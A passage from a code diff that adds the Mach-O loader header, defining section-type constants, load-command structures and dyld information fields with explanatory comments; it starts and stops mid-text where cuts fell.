the reserved2 field of the section structure. + */ +#define S_NON_LAZY_SYMBOL_POINTERS 0x6 /* section with only non-lazy + symbol pointers */ +#define S_LAZY_SYMBOL_POINTERS 0x7 /* section with only lazy symbol + pointers */ +#define S_SYMBOL_STUBS 0x8 /* section with only symbol + stubs, byte size of stub in + the reserved2 field */ +#define S_MOD_INIT_FUNC_POINTERS 0x9 /* section with only function + pointers for initialization*/ +#define S_MOD_TERM_FUNC_POINTERS 0xa /* section with only function + pointers for termination */ +#define S_COALESCED 0xb /* section contains symbols that + are to be coalesced */ +#define S_GB_ZEROFILL 0xc /* zero fill on demand section + (that can be larger than 4 + gigabytes) */ +#define S_INTERPOSING 0xd /* section with only pairs of + function pointers for + interposing */ +#define S_16BYTE_LITERALS 0xe /* section with only 16 byte + literals */ +#define S_DTRACE_DOF 0xf /* section contains + DTrace Object Format */ +#define S_LAZY_DYLIB_SYMBOL_POINTERS 0x10 /* section with only lazy + symbol pointers to lazy + loaded dylibs */ +/* + * Section types to support thread local variables + */ +#define S_THREAD_LOCAL_REGULAR 0x11 /* template of initial + values for TLVs */ +#define S_THREAD_LOCAL_ZEROFILL 0x12 /* template of initial + values for TLVs */ +#define S_THREAD_LOCAL_VARIABLES 0x13 /* TLV descriptors */ +#define S_THREAD_LOCAL_VARIABLE_POINTERS 0x14 /* pointers to TLV + descriptors */ +#define S_THREAD_LOCAL_INIT_FUNCTION_POINTERS 0x15 /* functions to call + to initialize TLV + values */ +#define S_INIT_FUNC_OFFSETS 0x16 /* 32-bit offsets to + initializers */ + +/* + * Constants for the section attributes part of the flags field of a section + * structure. + */ +#define SECTION_ATTRIBUTES_USR 0xff000000 /* User setable attributes */ +#define S_ATTR_PURE_INSTRUCTIONS 0x80000000 /* section contains only true + machine instructions */ +#define S_ATTR_NO_TOC 0x40000000 /* section contains coalesced + symbols that are not to be + in a ranlib table of + contents */ +#define S_ATTR_STRIP_STATIC_SYMS 0x20000000 /* ok to strip static symbols + in this section in files + with the MH_DYLDLINK flag */ +#define S_ATTR_NO_DEAD_STRIP 0x10000000 /* no dead stripping */ +#define S_ATTR_LIVE_SUPPORT 0x08000000 /* blocks are live if they + reference live blocks */ +#define S_ATTR_SELF_MODIFYING_CODE 0x04000000 /* Used with i386 code stubs + written on by dyld */ +/* + * If a segment contains any sections marked with S_ATTR_DEBUG then all + * sections in that segment must have this attribute. No section other than + * a section marked with this attribute may reference the contents of this + * section. A section with this attribute may contain no symbols and must have + * a section type S_REGULAR. The static linker will not copy section contents + * from sections with this attribute into its output file. These sections + * generally contain DWARF debugging info. + */ +#define S_ATTR_DEBUG 0x02000000 /* a debug section */ +#define SECTION_ATTRIBUTES_SYS 0x00ffff00 /* system setable attributes */ +#define S_ATTR_SOME_INSTRUCTIONS 0x00000400 /* section contains some + machine instructions */ +#define S_ATTR_EXT_RELOC 0x00000200 /* section has external + relocation entries */ +#define S_ATTR_LOC_RELOC 0x00000100 /* section has local + relocation entries */ + + +/* + * The names of segments and sections in them are mostly meaningless to the + * link-editor. But there are few things to support traditional UNIX + * executables that require the link-editor and assembler to use some names + * agreed upon by convention. + * + * The initial protection of the "__TEXT" segment has write protection turned + * off (not writeable). + * + * The link-editor will allocate common symbols at the end of the "__common" + * section in the "__DATA" segment. It will create the section and segment + * if needed. + */ + +/* The currently known segment names and the section names in those segments */ + +#define SEG_PAGEZERO "__PAGEZERO" /* the pagezero segment which has no */ + /* protections and catches NULL */ + /* references for MH_EXECUTE files */ + + +#define SEG_TEXT "__TEXT" /* the tradition UNIX text segment */ +#define SECT_TEXT "__text" /* the real text part of the text */ + /* section no headers, and no padding */ +#define SECT_FVMLIB_INIT0 "__fvmlib_init0" /* the fvmlib initialization */ + /* section */ +#define SECT_FVMLIB_INIT1 "__fvmlib_init1" /* the section following the */ + /* fvmlib initialization */ + /* section */ + +#define SEG_DATA "__DATA" /* the tradition UNIX data segment */ +#define SECT_DATA "__data" /* the real initialized data section */ + /* no padding, no bss overlap */ +#define SECT_BSS "__bss" /* the real uninitialized data section*/ + /* no padding */ +#define SECT_COMMON "__common" /* the section common symbols are */ + /* allocated in by the link editor */ + +#define SEG_OBJC "__OBJC" /* objective-C runtime segment */ +#define SECT_OBJC_SYMBOLS "__symbol_table" /* symbol table */ +#define SECT_OBJC_MODULES "__module_info" /* module information */ +#define SECT_OBJC_STRINGS "__selector_strs" /* string table */ +#define SECT_OBJC_REFS "__selector_refs" /* string table */ + +#define SEG_ICON "__ICON" /* the icon segment */ +#define SECT_ICON_HEADER "__header" /* the icon headers */ +#define SECT_ICON_TIFF "__tiff" /* the icons in tiff format */ + +#define SEG_LINKEDIT "__LINKEDIT" /* the segment containing all structs */ + /* created and maintained by the link */ + /* editor. Created with -seglinkedit */ + /* option to ld(1) for MH_EXECUTE and */ + /* FVMLIB file types only */ + +#define SEG_LINKINFO "__LINKINFO" /* the segment overlapping with linkedit */ + /* containing linking information */ + +#define SEG_UNIXSTACK "__UNIXSTACK" /* the unix stack segment */ + +#define SEG_IMPORT "__IMPORT" /* the segment for the self (dyld) */ + /* modifing code stubs that has read, */ + /* write and execute permissions */ + +/* + * Fixed virtual memory shared libraries are identified by two things. The + * target pathname (the name of the library as found for execution), and the + * minor version number. The address of where the headers are loaded is in + * header_addr. (THIS IS OBSOLETE and no longer supported). + */ +struct fvmlib { + union lc_str name; /* library's target pathname */ + uint32_t minor_version; /* library's minor version number */ + uint32_t header_addr; /* library's header address */ +}; + +/* + * A fixed virtual shared library (filetype == MH_FVMLIB in the mach header) + * contains a fvmlib_command (cmd == LC_IDFVMLIB) to identify the library. + * An object that uses a fixed virtual shared library also contains a + * fvmlib_command (cmd == LC_LOADFVMLIB) for each library it uses. + * (THIS IS OBSOLETE and no longer supported). + */ +struct fvmlib_command { + uint32_t cmd; /* LC_IDFVMLIB or LC_LOADFVMLIB */ + uint32_t cmdsize; /* includes pathname string */ + struct fvmlib fvmlib; /* the library identification */ +}; + +/* + * Dynamicly linked shared libraries are identified by two things. The + * pathname (the name of the library as found for execution), and the + * compatibility version number. The pathname must match and the compatibility + * number in the user of the library must be greater than or equal to the + * library being used. The time stamp is used to record the time a library was + * built and copied into user so it can be use to determined if the library used + * at runtime is exactly the same as used to built the program. + */ +struct dylib { + union lc_str name; /* library's path name */ + uint32_t timestamp; /* library's build time stamp */ + uint32_t current_version; /* library's current version number */ + uint32_t compatibility_version; /* library's compatibility vers number*/ +}; + +/* + * A dynamically linked shared library (filetype == MH_DYLIB in the mach header) + * contains a dylib_command (cmd == LC_ID_DYLIB) to identify the library. + * An object that uses a dynamically linked shared library also contains a + * dylib_command (cmd == LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, or + * LC_REEXPORT_DYLIB) for each library it uses. + */ +struct dylib_command { + uint32_t cmd; /* LC_ID_DYLIB, LC_LOAD_{,WEAK_}DYLIB, + LC_REEXPORT_DYLIB */ + uint32_t cmdsize; /* includes pathname string */ + struct dylib dylib; /* the library identification */ +}; + +/* + * A dynamically linked shared library may be a subframework of an umbrella + * framework. If so it will be linked with "-umbrella umbrella_name" where + * Where "umbrella_name" is the name of the umbrella framework. A subframework + * can only be linked against by its umbrella framework or other subframeworks + * that are part of the same umbrella framework. Otherwise the static link + * editor produces an error and states to link against the umbrella framework. + * The name of the umbrella framework for subframeworks is recorded in the + * following structure. + */ +struct sub_framework_command { + uint32_t cmd; /* LC_SUB_FRAMEWORK */ + uint32_t cmdsize; /* includes umbrella string */ + union lc_str umbrella; /* the umbrella framework name */ +}; + +/* + * For dynamically linked shared libraries that are subframework of an umbrella + * framework they can allow clients other than the umbrella framework or other + * subframeworks in the same umbrella framework. To do this the subframework + * is built with "-allowable_client client_name" and an LC_SUB_CLIENT load + * command is created for each -allowable_client flag. The client_name is + * usually a framework name. It can also be a name used for bundles clients + * where the bundle is built with "-client_name client_name". + */ +struct sub_client_command { + uint32_t cmd; /* LC_SUB_CLIENT */ + uint32_t cmdsize; /* includes client string */ + union lc_str client; /* the client name */ +}; + +/* + * A dynamically linked shared library may be a sub_umbrella of an umbrella + * framework. If so it will be linked with "-sub_umbrella umbrella_name" where + * Where "umbrella_name" is the name of the sub_umbrella framework. When + * staticly linking when -twolevel_namespace is in effect a twolevel namespace + * umbrella framework will only cause its subframeworks and those frameworks + * listed as sub_umbrella frameworks to be implicited linked in. Any other + * dependent dynamic libraries will not be linked it when -twolevel_namespace + * is in effect. The primary library recorded by the static linker when + * resolving a symbol in these libraries will be the umbrella framework. + * Zero or more sub_umbrella frameworks may be use by an umbrella framework. + * The name of a sub_umbrella framework is recorded in the following structure. + */ +struct sub_umbrella_command { + uint32_t cmd; /* LC_SUB_UMBRELLA */ + uint32_t cmdsize; /* includes sub_umbrella string */ + union lc_str sub_umbrella; /* the sub_umbrella framework name */ +}; + +/* + * A dynamically linked shared library may be a sub_library of another shared + * library. If so it will be linked with "-sub_library library_name" where + * Where "library_name" is the name of the sub_library shared library. When + * staticly linking when -twolevel_namespace is in effect a twolevel namespace + * shared library will only cause its subframeworks and those frameworks + * listed as sub_umbrella frameworks and libraries listed as sub_libraries to + * be implicited linked in. Any other dependent dynamic libraries will not be + * linked it when -twolevel_namespace is in effect. The primary library + * recorded by the static linker when resolving a symbol in these libraries + * will be the umbrella framework (or dynamic library). Zero or more sub_library + * shared libraries may be use by an umbrella framework or (or dynamic library). + * The name of a sub_library framework is recorded in the following structure. + * For example /usr/lib/libobjc_profile.A.dylib would be recorded as "libobjc". + */ +struct sub_library_command { + uint32_t cmd; /* LC_SUB_LIBRARY */ + uint32_t cmdsize; /* includes sub_library string */ + union lc_str sub_library; /* the sub_library name */ +}; + +/* + * A program (filetype == MH_EXECUTE) that is + * prebound to its dynamic libraries has one of these for each library that + * the static linker used in prebinding. It contains a bit vector for the + * modules in the library. The bits indicate which modules are bound (1) and + * which are not (0) from the library. The bit for module 0 is the low bit + * of the first byte. So the bit for the Nth module is: + * (linked_modules[N/8] >> N%8) & 1 + */ +struct prebound_dylib_command { + uint32_t cmd; /* LC_PREBOUND_DYLIB */ + uint32_t cmdsize; /* includes strings */ + union lc_str name; /* library's path name */ + uint32_t nmodules; /* number of modules in library */ + union lc_str linked_modules; /* bit vector of linked modules */ +}; + +/* + * A program that uses a dynamic linker contains a dylinker_command to identify + * the name of the dynamic linker (LC_LOAD_DYLINKER). And a dynamic linker + * contains a dylinker_command to identify the dynamic linker (LC_ID_DYLINKER). + * A file can have at most one of these. + * This struct is also used for the LC_DYLD_ENVIRONMENT load command and + * contains string for dyld to treat like environment variable. + */ +struct dylinker_command { + uint32_t cmd; /* LC_ID_DYLINKER, LC_LOAD_DYLINKER or + LC_DYLD_ENVIRONMENT */ + uint32_t cmdsize; /* includes pathname string */ + union lc_str name; /* dynamic linker's path name */ +}; + +/* + * Thread commands contain machine-specific data structures suitable for + * use in the thread state primitives. The machine specific data structures + * follow the struct thread_command as follows. + * Each flavor of machine specific data structure is preceded by an uint32_t + * constant for the flavor of that data structure, an uint32_t that is the + * count of uint32_t's of the size of the state data structure and then + * the state data structure follows. This triple may be repeated for many + * flavors. The constants for the flavors, counts and state data structure + * definitions are expected to be in the header file . + * These machine specific data structures sizes must be multiples of + * 4 bytes. The cmdsize reflects the total size of the thread_command + * and all of the sizes of the constants for the flavors, counts and state + * data structures. + * + * For executable objects that are unix processes there will be one + * thread_command (cmd == LC_UNIXTHREAD) created for it by the link-editor. + * This is the same as a LC_THREAD, except that a stack is automatically + * created (based on the shell's limit for the stack size). Command arguments + * and environment variables are copied onto that stack. + */ +struct thread_command { + uint32_t cmd; /* LC_THREAD or LC_UNIXTHREAD */ + uint32_t cmdsize; /* total size of this command */ + /* uint32_t flavor flavor of thread state */ + /* uint32_t count count of uint32_t's in thread state */ + /* struct XXX_thread_state state thread state for this flavor */ + /* ... */ +}; + +/* + * The routines command contains the address of the dynamic shared library + * initialization routine and an index into the module table for the module + * that defines the routine. Before any modules are used from the library the + * dynamic linker fully binds the module that defines the initialization routine + * and then calls it. This gets called before any module initialization + * routines (used for C++ static constructors) in the library. + */ +struct routines_command { /* for 32-bit architectures */ + uint32_t cmd; /* LC_ROUTINES */ + uint32_t cmdsize; /* total size of this command */ + uint32_t init_address; /* address of initialization routine */ + uint32_t init_module; /* index into the module table that */ + /* the init routine is defined in */ + uint32_t reserved1; + uint32_t reserved2; + uint32_t reserved3; + uint32_t reserved4; + uint32_t reserved5; + uint32_t reserved6; +}; + +/* + * The 64-bit routines command. Same use as above. + */ +struct routines_command_64 { /* for 64-bit architectures */ + uint32_t cmd; /* LC_ROUTINES_64 */ + uint32_t cmdsize; /* total size of this command */ + uint64_t init_address; /* address of initialization routine */ + uint64_t init_module; /* index into the module table that */ + /* the init routine is defined in */ + uint64_t reserved1; + uint64_t reserved2; + uint64_t reserved3; + uint64_t reserved4; + uint64_t reserved5; + uint64_t reserved6; +}; + +/* + * The symtab_command contains the offsets and sizes of the link-edit 4.3BSD + * "stab" style symbol table information as described in the header files + * and . + */ +struct symtab_command { + uint32_t cmd; /* LC_SYMTAB */ + uint32_t cmdsize; /* sizeof(struct symtab_command) */ + uint32_t symoff; /* symbol table offset */ + uint32_t nsyms; /* number of symbol table entries */ + uint32_t stroff; /* string table offset */ + uint32_t strsize; /* string table size in bytes */ +}; + +/* + * This is the second set of the symbolic information which is used to support + * the data structures for the dynamically link editor. + * + * The original set of symbolic information in the symtab_command which contains + * the symbol and string tables must also be present when this load command is + * present. When this load command is present the symbol table is organized + * into three groups of symbols: + * local symbols (static and debugging symbols) - grouped by module + * defined external symbols - grouped by module (sorted by name if not lib) + * undefined external symbols (sorted by name if MH_BINDATLOAD is not set, + * and in order the were seen by the static + * linker if MH_BINDATLOAD is set) + * In this load command there are offsets and counts to each of the three groups + * of symbols. + * + * This load command contains a the offsets and sizes of the following new + * symbolic information tables: + * table of contents + * module table + * reference symbol table + * indirect symbol table + * The first three tables above (the table of contents, module table and + * reference symbol table) are only present if the file is a dynamically linked + * shared library. For executable and object modules, which are files + * containing only one module, the information that would be in these three + * tables is determined as follows: + * table of contents - the defined external symbols are sorted by name + * module table - the file contains only one module so everything in the + * file is part of the module. + * reference symbol table - is the defined and undefined external symbols + * + * For dynamically linked shared library files this load command also contains + * offsets and sizes to the pool of relocation entries for all sections + * separated into two groups: + * external relocation entries + * local relocation entries + * For executable and object modules the relocation entries continue to hang + * off the section structures. + */ +struct dysymtab_command { + uint32_t cmd; /* LC_DYSYMTAB */ + uint32_t cmdsize; /* sizeof(struct dysymtab_command) */ + + /* + * The symbols indicated by symoff and nsyms of the LC_SYMTAB load command + * are grouped into the following three groups: + * local symbols (further grouped by the module they are from) + * defined external symbols (further grouped by the module they are from) + * undefined symbols + * + * The local symbols are used only for debugging. The dynamic binding + * process may have to use them to indicate to the debugger the local + * symbols for a module that is being bound. + * + * The last two groups are used by the dynamic binding process to do the + * binding (indirectly through the module table and the reference symbol + * table when this is a dynamically linked shared library file). + */ + uint32_t ilocalsym; /* index to local symbols */ + uint32_t nlocalsym; /* number of local symbols */ + + uint32_t iextdefsym;/* index to externally defined symbols */ + uint32_t nextdefsym;/* number of externally defined symbols */ + + uint32_t iundefsym; /* index to undefined symbols */ + uint32_t nundefsym; /* number of undefined symbols */ + + /* + * For the for the dynamic binding process to find which module a symbol + * is defined in the table of contents is used (analogous to the ranlib + * structure in an archive) which maps defined external symbols to modules + * they are defined in. This exists only in a dynamically linked shared + * library file. For executable and object modules the defined external + * symbols are sorted by name and is use as the table of contents. + */ + uint32_t tocoff; /* file offset to table of contents */ + uint32_t ntoc; /* number of entries in table of contents */ + + /* + * To support dynamic binding of "modules" (whole object files) the symbol + * table must reflect the modules that the file was created from. This is + * done by having a module table that has indexes and counts into the merged + * tables for each module. The module structure that these two entries + * refer to is described below. This exists only in a dynamically linked + * shared library file. For executable and object modules the file only + * contains one module so everything in the file belongs to the module. + */ + uint32_t modtaboff; /* file offset to module table */ + uint32_t nmodtab; /* number of module table entries */ + + /* + * To support dynamic module binding the module structure for each module + * indicates the external references (defined and undefined) each module + * makes. For each module there is an offset and a count into the + * reference symbol table for the symbols that the module references. + * This exists only in a dynamically linked shared library file. For + * executable and object modules the defined external symbols and the + * undefined external symbols indicates the external references. + */ + uint32_t extrefsymoff; /* offset to referenced symbol table */ + uint32_t nextrefsyms; /* number of referenced symbol table entries */ + + /* + * The sections that contain "symbol pointers" and "routine stubs" have + * indexes and (implied counts based on the size of the section and fixed + * size of the entry) into the "indirect symbol" table for each pointer + * and stub. For every section of these two types the index into the + * indirect symbol table is stored in the section header in the field + * reserved1. An indirect symbol table entry is simply a 32bit index into + * the symbol table to the symbol that the pointer or stub is referring to. + * The indirect symbol table is ordered to match the entries in the section. + */ + uint32_t indirectsymoff; /* file offset to the indirect symbol table */ + uint32_t nindirectsyms; /* number of indirect symbol table entries */ + + /* + * To support relocating an individual module in a library file quickly the + * external relocation entries for each module in the library need to be + * accessed efficiently. Since the relocation entries can't be accessed + * through the section headers for a library file they are separated into + * groups of local and external entries further grouped by module. In this + * case the presents of this load command who's extreloff, nextrel, + * locreloff and nlocrel fields are non-zero indicates that the relocation + * entries of non-merged sections are not referenced through the section + * structures (and the reloff and nreloc fields in the section headers are + * set to zero). + * + * Since the relocation entries are not accessed through the section headers + * this requires the r_address field to be something other than a section + * offset to identify the item to be relocated. In this case r_address is + * set to the offset from the vmaddr of the first LC_SEGMENT command. + * For MH_SPLIT_SEGS images r_address is set to the the offset from the + * vmaddr of the first read-write LC_SEGMENT command. + * + * The relocation entries are grouped by module and the module table + * entries have indexes and counts into them for the group of external + * relocation entries for that the module. + * + * For sections that are merged across modules there must not be any + * remaining external relocation entries for them (for merged sections + * remaining relocation entries must be local). + */ + uint32_t extreloff; /* offset to external relocation entries */ + uint32_t nextrel; /* number of external relocation entries */ + + /* + * All the local relocation entries are grouped together (they are not + * grouped by their module since they are only used if the object is moved + * from it staticly link edited address). + */ + uint32_t locreloff; /* offset to local relocation entries */ + uint32_t nlocrel; /* number of local relocation entries */ + +}; + +/* + * An indirect symbol table entry is simply a 32bit index into the symbol table + * to the symbol that the pointer or stub is refering to. Unless it is for a + * non-lazy symbol pointer section for a defined symbol which strip(1) as + * removed. In which case it has the value INDIRECT_SYMBOL_LOCAL. If the + * symbol was also absolute INDIRECT_SYMBOL_ABS is or'ed with that. + */ +#define INDIRECT_SYMBOL_LOCAL 0x80000000 +#define INDIRECT_SYMBOL_ABS 0x40000000 + + +/* a table of contents entry */ +struct dylib_table_of_contents { + uint32_t symbol_index; /* the defined external symbol + (index into the symbol table) */ + uint32_t module_index; /* index into the module table this symbol + is defined in */ +}; + +/* a module table entry */ +struct dylib_module { + uint32_t module_name; /* the module name (index into string table) */ + + uint32_t iextdefsym; /* index into externally defined symbols */ + uint32_t nextdefsym; /* number of externally defined symbols */ + uint32_t irefsym; /* index into reference symbol table */ + uint32_t nrefsym; /* number of reference symbol table entries */ + uint32_t ilocalsym; /* index into symbols for local symbols */ + uint32_t nlocalsym; /* number of local symbols */ + + uint32_t iextrel; /* index into external relocation entries */ + uint32_t nextrel; /* number of external relocation entries */ + + uint32_t iinit_iterm; /* low 16 bits are the index into the init + section, high 16 bits are the index into + the term section */ + uint32_t ninit_nterm; /* low 16 bits are the number of init section + entries, high 16 bits are the number of + term section entries */ + + uint32_t /* for this module address of the start of */ + objc_module_info_addr; /* the (__OBJC,__module_info) section */ + uint32_t /* for this module size of */ + objc_module_info_size; /* the (__OBJC,__module_info) section */ +}; + +/* a 64-bit module table entry */ +struct dylib_module_64 { + uint32_t module_name; /* the module name (index into string table) */ + + uint32_t iextdefsym; /* index into externally defined symbols */ + uint32_t nextdefsym; /* number of externally defined symbols */ + uint32_t irefsym; /* index into reference symbol table */ + uint32_t nrefsym; /* number of reference symbol table entries */ + uint32_t ilocalsym; /* index into symbols for local symbols */ + uint32_t nlocalsym; /* number of local symbols */ + + uint32_t iextrel; /* index into external relocation entries */ + uint32_t nextrel; /* number of external relocation entries */ + + uint32_t iinit_iterm; /* low 16 bits are the index into the init + section, high 16 bits are the index into + the term section */ + uint32_t ninit_nterm; /* low 16 bits are the number of init section + entries, high 16 bits are the number of + term section entries */ + + uint32_t /* for this module size of */ + objc_module_info_size; /* the (__OBJC,__module_info) section */ + uint64_t /* for this module address of the start of */ + objc_module_info_addr; /* the (__OBJC,__module_info) section */ +}; + +/* + * The entries in the reference symbol table are used when loading the module + * (both by the static and dynamic link editors) and if the module is unloaded + * or replaced. Therefore all external symbols (defined and undefined) are + * listed in the module's reference table. The flags describe the type of + * reference that is being made. The constants for the flags are defined in + * as they are also used for symbol table entries. + */ +struct dylib_reference { + uint32_t isym:24, /* index into the symbol table */ + flags:8; /* flags to indicate the type of reference */ +}; + +/* + * The twolevel_hints_command contains the offset and number of hints in the + * two-level namespace lookup hints table. + */ +struct twolevel_hints_command { + uint32_t cmd; /* LC_TWOLEVEL_HINTS */ + uint32_t cmdsize; /* sizeof(struct twolevel_hints_command) */ + uint32_t offset; /* offset to the hint table */ + uint32_t nhints; /* number of hints in the hint table */ +}; + +/* + * The entries in the two-level namespace lookup hints table are twolevel_hint + * structs. These provide hints to the dynamic link editor where to start + * looking for an undefined symbol in a two-level namespace image. The + * isub_image field is an index into the sub-images (sub-frameworks and + * sub-umbrellas list) that made up the two-level image that the undefined + * symbol was found in when it was built by the static link editor. If + * isub-image is 0 the the symbol is expected to be defined in library and not + * in the sub-images. If isub-image is non-zero it is an index into the array + * of sub-images for the umbrella with the first index in the sub-images being + * 1. The array of sub-images is the ordered list of sub-images of the umbrella + * that would be searched for a symbol that has the umbrella recorded as its + * primary library. The table of contents index is an index into the + * library's table of contents. This is used as the starting point of the + * binary search or a directed linear search. + */ +struct twolevel_hint { + uint32_t + isub_image:8, /* index into the sub images */ + itoc:24; /* index into the table of contents */ +}; + +/* + * The prebind_cksum_command contains the value of the original check sum for + * prebound files or zero. When a prebound file is first created or modified + * for other than updating its prebinding information the value of the check sum + * is set to zero. When the file has it prebinding re-done and if the value of + * the check sum is zero the original check sum is calculated and stored in + * cksum field of this load command in the output file. If when the prebinding + * is re-done and the cksum field is non-zero it is left unchanged from the + * input file. + */ +struct prebind_cksum_command { + uint32_t cmd; /* LC_PREBIND_CKSUM */ + uint32_t cmdsize; /* sizeof(struct prebind_cksum_command) */ + uint32_t cksum; /* the check sum or zero */ +}; + +/* + * The uuid load command contains a single 128-bit unique random number that + * identifies an object produced by the static link editor. + */ +struct uuid_command { + uint32_t cmd; /* LC_UUID */ + uint32_t cmdsize; /* sizeof(struct uuid_command) */ + uint8_t uuid[16]; /* the 128-bit uuid */ +}; + +/* + * The rpath_command contains a path which at runtime should be added to + * the current run path used to find @rpath prefixed dylibs. + */ +struct rpath_command { + uint32_t cmd; /* LC_RPATH */ + uint32_t cmdsize; /* includes string */ + union lc_str path; /* path to add to run path */ +}; + +/* + * The linkedit_data_command contains the offsets and sizes of a blob + * of data in the __LINKEDIT segment. + */ +struct linkedit_data_command { + uint32_t cmd; /* LC_CODE_SIGNATURE, LC_SEGMENT_SPLIT_INFO, + LC_FUNCTION_STARTS, LC_DATA_IN_CODE, + LC_DYLIB_CODE_SIGN_DRS, + LC_LINKER_OPTIMIZATION_HINT, + LC_DYLD_EXPORTS_TRIE, or + LC_DYLD_CHAINED_FIXUPS. */ + uint32_t cmdsize; /* sizeof(struct linkedit_data_command) */ + uint32_t dataoff; /* file offset of data in __LINKEDIT segment */ + uint32_t datasize; /* file size of data in __LINKEDIT segment */ +}; + +struct fileset_entry_command { + uint32_t cmd; /* LC_FILESET_ENTRY */ + uint32_t cmdsize; /* includes id string */ + uint64_t vmaddr; /* memory address of the dylib */ + uint64_t fileoff; /* file offset of the dylib */ + union lc_str entry_id; /* contained entry id */ + uint32_t reserved; /* entry_id is 32-bits long, so this is the reserved padding */ +}; + +/* + * The encryption_info_command contains the file offset and size of an + * of an encrypted segment. + */ +struct encryption_info_command { + uint32_t cmd; /* LC_ENCRYPTION_INFO */ + uint32_t cmdsize; /* sizeof(struct encryption_info_command) */ + uint32_t cryptoff; /* file offset of encrypted range */ + uint32_t cryptsize; /* file size of encrypted range */ + uint32_t cryptid; /* which enryption system, + 0 means not-encrypted yet */ +}; + +/* + * The encryption_info_command_64 contains the file offset and size of an + * of an encrypted segment (for use in x86_64 targets). + */ +struct encryption_info_command_64 { + uint32_t cmd; /* LC_ENCRYPTION_INFO_64 */ + uint32_t cmdsize; /* sizeof(struct encryption_info_command_64) */ + uint32_t cryptoff; /* file offset of encrypted range */ + uint32_t cryptsize; /* file size of encrypted range */ + uint32_t cryptid; /* which enryption system, + 0 means not-encrypted yet */ + uint32_t pad; /* padding to make this struct's size a multiple + of 8 bytes */ +}; + +/* + * The version_min_command contains the min OS version on which this + * binary was built to run. + */ +struct version_min_command { + uint32_t cmd; /* LC_VERSION_MIN_MACOSX or + LC_VERSION_MIN_IPHONEOS or + LC_VERSION_MIN_WATCHOS or + LC_VERSION_MIN_TVOS */ + uint32_t cmdsize; /* sizeof(struct min_version_command) */ + uint32_t version; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ + uint32_t sdk; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ +}; + +/* + * The build_version_command contains the min OS version on which this + * binary was built to run for its platform. The list of known platforms and + * tool values following it. + */ +struct build_version_command { + uint32_t cmd; /* LC_BUILD_VERSION */ + uint32_t cmdsize; /* sizeof(struct build_version_command) plus */ + /* ntools * sizeof(struct build_tool_version) */ + uint32_t platform; /* platform */ + uint32_t minos; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ + uint32_t sdk; /* X.Y.Z is encoded in nibbles xxxx.yy.zz */ + uint32_t ntools; /* number of tool entries following this */ +}; + +struct build_tool_version { + uint32_t tool; /* enum for the tool */ + uint32_t version; /* version number of the tool */ +}; + +/* Known values for the platform field above. */ +#define PLATFORM_MACOS 1 +#define PLATFORM_IOS 2 +#define PLATFORM_TVOS 3 +#define PLATFORM_WATCHOS 4 +#define PLATFORM_BRIDGEOS 5 +#define PLATFORM_MACCATALYST 6 +#define PLATFORM_IOSSIMULATOR 7 +#define PLATFORM_TVOSSIMULATOR 8 +#define PLATFORM_WATCHOSSIMULATOR 9 +#define PLATFORM_DRIVERKIT 10 +#define PLATFORM_MAX PLATFORM_DRIVERKIT +/* Addition of simulated platfrom also needs to update proc_is_simulated() */ + +/* Known values for the tool field above. */ +#define TOOL_CLANG 1 +#define TOOL_SWIFT 2 +#define TOOL_LD 3 + +/* + * The dyld_info_command contains the file offsets and sizes of + * the new compressed form of the information dyld needs to + * load the image. This information is used by dyld on Mac OS X + * 10.6 and later. All information pointed to by this command + * is encoded using byte streams, so no endian swapping is needed + * to interpret it. + */ +struct dyld_info_command { + uint32_t cmd; /* LC_DYLD_INFO or LC_DYLD_INFO_ONLY */ + uint32_t cmdsize; /* sizeof(struct dyld_info_command) */ + + /* + * Dyld rebases an image whenever dyld loads it at an address different + * from its preferred address. The rebase information is a stream + * of byte sized opcodes whose symbolic names start with REBASE_OPCODE_. + * Conceptually the rebase information is a table of tuples: + * + * The opcodes are a compressed way to encode the table by only + * encoding when a column changes. In addition simple patterns + * like "every n'th offset for m times" can be encoded in a few + * bytes. + */ + uint32_t rebase_off; /* file offset to rebase info */ + uint32_t rebase_size; /* size of rebase info */ + + /* + * Dyld binds an image during the loading process, if the image + * requires any pointers to be initialized to symbols in other images. + * The bind information is a stream of byte sized + * opcodes whose symbolic names start with BIND_OPCODE_. + * Conceptually the bind information is a table of tuples: + * + * The opcodes are a compressed way to encode the table by only + * encoding when a column changes. In addition simple patterns + * like for runs of pointers initialzed to the same value can be + * encoded in a few bytes. + */ + uint32_t bind_off; /* file offset to binding info */ + uint32_t bind_size; /* size of binding info */ + + /* + * Some C++ programs require dyld to unique symbols so that all + * images in the process use the same copy of some code/data. + * This step is done after binding. The content of the weak_bind + * info is an opcode stream like the bind_info. But it is sorted + * alphabetically by symbol name. This enable dyld to walk + * all images with weak binding information in order and look + * for collisions. If there are no collisions, dyld does + * no updating. That means that some fixups are also encoded + * in the bind_info. For instance, all calls to "operator new" + * are first bound to libstdc++.dylib using the information + * in bind_info. Then if some image overrides operator new + * that is detected when the weak_bind information is processed + * and the call to operator new is then rebound. + */ + uint32_t weak_bind_off; /* file offset to weak binding info */ + uint32_t weak_bind_size; /* size of weak binding info */ + + /* + * Some uses of external symbols do not need to be bound immediately. + * Instead they can be lazily bound on first use. The lazy_bind + * are contains a stream of BIND opcodes to bind all lazy symbols. + * Normal use is that dyld ignores the lazy_bind section when + * loading an image. Instead the static linker arranged for the + * lazy pointer to initially point to a helper function which + * pushes the offset into the lazy_bind area for the symbol + * needing to be bound, then jumps to dyld which simply adds + * the offset to lazy_bind_off to get the information on what + * to bind. + */ + uint32_t lazy_bind_off; /* file offset to lazy binding info */ + uint32_t lazy_bind_size; /* size of lazy binding infs */ + + /* + * The symbols exported by a dylib are encoded in a trie. This + * is a compact representation that factors out common prefixes. + * It also reduces LINKEDIT pages in RAM because it encodes all + * information (name, address, flags) in one small, contiguous range. + * The export area is a stream of nodes. The first node sequentially + * is the start node for the trie. + * + * Nodes for a symbol start with a uleb128 that is the length of + * the exported symbol information for the string so far. + * If there is no exported symbol, the node starts with a zero byte. + * If there is exported info, it follows the length. + * + * First is a uleb128 containing flags. Normally, it is followed by + * a uleb128 encoded offset which is location of the content named + * by the symbol from the mach_header for the image. If the flags + * is EXPORT_SYMBOL_FLAGS_REEXPORT, then following the flags is + * a uleb128 encoded library ordinal, then a zero terminated + * UTF8 string. If the string is zero length, then the symbol + * is re-export from the specified dylib with the same name. + * If the flags is EXPORT_SYMBOL_FLAGS_STUB_AND_RESOLVER, then following + * the flags is two uleb128s: the stub offset and the 